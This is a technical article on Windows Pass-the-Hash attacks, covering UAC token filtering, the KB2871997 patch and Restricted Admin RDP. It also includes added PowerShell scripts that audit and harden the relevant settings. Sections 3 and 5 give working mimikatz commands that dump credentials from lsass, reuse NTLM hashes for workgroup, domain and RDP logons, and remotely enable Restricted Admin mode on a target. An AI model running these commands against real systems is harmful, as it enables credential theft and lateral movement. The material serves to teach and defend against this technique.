
Title: PTH(Pass The Hash) Attack Analysis


PTH (Pass The Hash) Attack

1 Overview

After obtaining the NTLM hash of an account that belongs to a host's local Administrators group, there is no need to crack the plaintext password. The PTH method injects the administrator account and its NTLM hash into the current session as credentials, and those credentials are then used to gain administrative access on neighbouring hosts.

The other host must have the same account, and that account must be a member of its local Administrators group.

On Windows NT 5.x, a network logon with any Administrators group account obtains full system administration rights.

On Windows NT 6.x and later, a network logon with an Administrators group account other than the built-in Administrator (SID 500) cannot obtain system administration rights; a network logon with the Administrator (SID 500) account still can.

This type of attack is suitable for:

Domain or workgroup environments

Situations where a hash can be obtained but conditions do not allow it to be cracked

Intranets where other machines use the same password as the current machine

2 UAC

User Account Control (UAC) is a set of infrastructure technologies introduced in Windows Vista (and kept in later versions) that helps prevent malicious programs (sometimes called 'malware') from damaging the system, while also helping organizations deploy a more manageable platform.

With UAC, applications and tasks always run in the security context of a non-administrator account, except when an administrator specifically grants administrator-level access to the system. UAC blocks the automatic installation of unauthorized applications and prevents unintentional changes to system settings.

User Account Control (UAC) is a core security feature of newer Windows versions and one of its most often misunderstood features.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken: UAC's handling of the built-in Administrator is determined by this registry value, whose default is 0. If it is set to 1, the SID 500 administrator cannot obtain high privileges through a network logon.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy: if this value exists in the registry and is set to 1, all members of the Administrators group can obtain high privileges through a network logon, and it also governs the effect of the FilterAdministratorToken value described above.

3 Attack

The pth function of mimikatz requires local administrator privileges; this follows from how it is implemented, since it must first read information from the high-privilege lsass.exe process.

On 8.1/2012 R2, and on Win 7/2008 R2/8/2012 once patch KB2871997 is installed, AES keys can be used instead of the NT hash.

Use mimikatz to get the hash first:

privilege::debug

sekurlsa::logonpasswords

With the hash obtained:

3.1 Workgroup

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

Microsoft also patched pth, and testing showed that after the patch a regular Pass The Hash no longer succeeds, except with the default Administrator (SID 500) account. With that account, a Pass The Hash remote IPC connection still works.

3.2 Domain users

Prerequisite: the domain user is a member of the local Administrators group.

sekurlsa::pth /user:eviluser /domain:adsec.com /ntlm:ccef208c6485269c20db2cad21734fe7

Domain users are not affected by the patch.

4 KB2871997

Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machines using local accounts…

Installing the KB2871997 patch changes little else. The patch adds the S-1-5-113 SID to every local account and the S-1-5-114 SID to local accounts that are members of the Administrators group, so that they can be managed through domain policy, for example by completely prohibiting network logon for such accounts via Group Policy.
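The following script is an added example, not part of the original post, showing how to verify that the two well-known SIDs this section describes are actually used in the local "Deny access to this computer from the network" and "Deny log on through Remote Desktop Services" user rights. It exports the local security policy with `secedit /export` and parses the `[Privilege Rights]` section; the sample export text at the bottom is constructed for this example.

```powershell
# Added example, not from the original post: check whether the KB2871997 well-known SIDs
# (S-1-5-113 "Local account", S-1-5-114 "Local account and member of Administrators group")
# appear in SeDenyNetworkLogonRight and SeDenyRemoteInteractiveLogonRight on this host.
# The policy is exported with secedit and parsed; the sample export text is constructed.

$WellKnownSids = @{
    'S-1-5-113' = 'Local account'
    'S-1-5-114' = 'Local account and member of Administrators group'
}

function ConvertFrom-SeceditExport {
    # Parse the [Privilege Rights] section of a secedit .inf export into right -> SID list
    param([string]$Text)
    $rights = @{}
    $inSection = $false
    foreach ($line in $Text -split "`r?`n") {
        if ($line -match '^\[(.+)\]') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
        if ($inSection -and $line -match '^\s*(\w+)\s*=\s*(.*)$') {
            # Values are comma-separated; SIDs are written with a leading '*'
            $rights[$Matches[1]] = @($Matches[2] -split ',' |
                ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ })
        }
    }
    return $rights
}

function Test-LocalAccountDenyRights {
    # One row per (right, well-known SID): Denied = $true means the SID is in the deny list
    param([hashtable]$Rights)
    $result = @()
    foreach ($right in 'SeDenyNetworkLogonRight', 'SeDenyRemoteInteractiveLogonRight') {
        foreach ($sid in $WellKnownSids.Keys) {
            $present = $Rights.ContainsKey($right) -and ($Rights[$right] -contains $sid)
            $result += [pscustomobject]@{
                Right = $right; Sid = $sid; Group = $WellKnownSids[$sid]; Denied = $present
            }
        }
    }
    return $result
}

function Get-LocalSecurityPolicyRights {
    # Live export of the user-rights area; needs an elevated shell
    $tmp = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $tmp /areas USER_RIGHTS | Out-Null
    try { ConvertFrom-SeceditExport (Get-Content $tmp -Raw) }
    finally { Remove-Item $tmp -ErrorAction SilentlyContinue }
}

# Constructed sample: S-1-5-114 is denied network logon, but neither SID is denied RDP logon
$sampleExport = @'
[Unicode]
Unicode=yes
[Privilege Rights]
SeDenyNetworkLogonRight = *S-1-5-114,*S-1-5-32-546
SeDenyRemoteInteractiveLogonRight = *S-1-5-32-546
SeNetworkLogonRight = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
'@

Test-LocalAccountDenyRights (ConvertFrom-SeceditExport $sampleExport) | Format-Table -AutoSize
# Live check:  Test-LocalAccountDenyRights (Get-LocalSecurityPolicyRights) | Format-Table -AutoSize
```

On a domain-joined host the same rights are normally set centrally through Group Policy; the export reflects the effective local result, so it can confirm that the policy this section describes actually reached the machine.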

5 Pass-the-hash attack against RDP

Speaking of pass-the-hash (pth) attacks, I think the common ones are psexec, wce, mimikatz and other tools that execute commands directly.

This section introduces a method that uses mimikatz + NT hash to start mstsc.exe and log in to a remote Windows desktop, which is a great help in environments where commands cannot be executed and the password cannot be cracked.

The principle (and precondition) is that the remote target must be using Restricted Admin Mode; because this mode supports Kerberos authentication, the hash can be used to log in.

sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's NTLM hash> /run:"mstsc.exe /restrictedadmin"

If Restricted Admin mode is disabled, use the following command to enable it:

mimikatz.exe "sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's NTLM hash> /run:powershell.exe"

In the PowerShell window that appears, modify the registry:

Enter-PSSession -ComputerName Target

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD -Force

6 Defense

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken corresponds to the "Admin Approval Mode for the Built-in Administrator account" setting. UAC's handling of the built-in Administrator is determined by this registry value, whose default is 0. If it is set to 1, the SID 500 administrator cannot obtain high privileges through a network logon.
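The following audit script is an added example and not part of the original post. It reads the three registry values this page discusses (FilterAdministratorToken and LocalAccountTokenFilterPolicy from section 2, DisableRestrictedAdmin from section 5), reports what each means for network logons with a local administrator's hash using the interpretations given above, and offers a hardening function that sets the two UAC values to their filtering state. The demo at the bottom runs against a constructed key under HKCU so it can be executed without touching the real policy; the `Rid500RemoteAdmin`, `OtherLocalAdminsRemoteAdmin` and `RestrictedAdminRdpEnabled` field names are this example's own.

```powershell
# Added example, not from the original post: audit (and optionally harden) the registry
# values this page names. Interpretation follows the text above:
#   FilterAdministratorToken      default 0; 1 = SID 500 Administrator is filtered over the network
#   LocalAccountTokenFilterPolicy absent/0 = non-500 local admins filtered; 1 = full token, pth works
#   DisableRestrictedAdmin        0 = Restricted Admin RDP enabled (section 5); 1 or absent = disabled
# Run elevated for a real audit; Set-PthHardening changes only the two UAC values.

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RegDword {
    # Returns the DWORD value, or $null when the key or value does not exist
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Get-PthExposure {
    param([string]$PolicyPath = $PolicyKey, [string]$LsaPath = $LsaKey)
    $fat  = Get-RegDword $PolicyPath 'FilterAdministratorToken'
    $latp = Get-RegDword $PolicyPath 'LocalAccountTokenFilterPolicy'
    $dra  = Get-RegDword $LsaPath    'DisableRestrictedAdmin'
    [pscustomobject]@{
        FilterAdministratorToken      = $fat
        LocalAccountTokenFilterPolicy = $latp
        DisableRestrictedAdmin        = $dra
        Rid500RemoteAdmin             = ($fat -ne 1)    # built-in Administrator keeps a full token remotely
        OtherLocalAdminsRemoteAdmin   = ($latp -eq 1)   # every local admin keeps a full token remotely
        RestrictedAdminRdpEnabled     = ($dra -eq 0)    # hash-based RDP logon possible (section 5)
    }
}

function Set-PthHardening {
    # Filter the built-in Administrator and restore the default filtering for other local admins
    param([string]$PolicyPath = $PolicyKey)
    $before = Get-PthExposure -PolicyPath $PolicyPath
    New-ItemProperty -Path $PolicyPath -Name 'FilterAdministratorToken' -Value 1 -PropertyType DWORD -Force | Out-Null
    # Removing the value restores the default (filtered) behaviour for non-500 local admins
    Remove-ItemProperty -Path $PolicyPath -Name 'LocalAccountTokenFilterPolicy' -ErrorAction SilentlyContinue
    [pscustomobject]@{ Before = $before; After = (Get-PthExposure -PolicyPath $PolicyPath) }
}

# Offline demonstration against a constructed key under HKCU (no admin rights needed,
# nothing system-wide changes): start in the exposed state, then apply the hardening
$demo = 'HKCU:\Software\PthAuditDemo\System'
New-Item -Path $demo -Force | Out-Null
New-ItemProperty -Path $demo -Name 'LocalAccountTokenFilterPolicy' -Value 1 -PropertyType DWORD -Force | Out-Null
Get-PthExposure -PolicyPath $demo -LsaPath $demo | Format-List
Set-PthHardening -PolicyPath $demo | Format-List
Remove-Item -Path 'HKCU:\Software\PthAuditDemo' -Recurse -Force

# Real audit:    Get-PthExposure | Format-List
# Real harden:   Set-PthHardening            (elevated shell)
```

DisableRestrictedAdmin is reported but deliberately not changed by the hardening function: Restricted Admin mode keeps the RDP user's credentials off the target, so whether to leave it enabled is a trade-off that the audit output should inform rather than decide.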
